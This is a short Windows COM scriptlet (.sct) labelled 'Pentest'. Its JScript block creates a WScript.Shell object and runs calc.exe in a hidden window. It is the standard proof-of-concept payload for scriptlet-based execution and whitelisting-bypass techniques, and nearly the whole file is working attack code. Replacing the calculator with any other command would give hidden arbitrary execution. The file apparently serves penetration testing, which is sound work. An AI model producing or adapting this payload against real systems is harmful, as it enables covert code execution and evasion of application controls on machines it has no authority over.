<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var c= 'calc.exe'; 
new ActiveXObject("WScript.Shell").Run(c,0);
]]>
 
</script>
</registration>
</scriptlet>
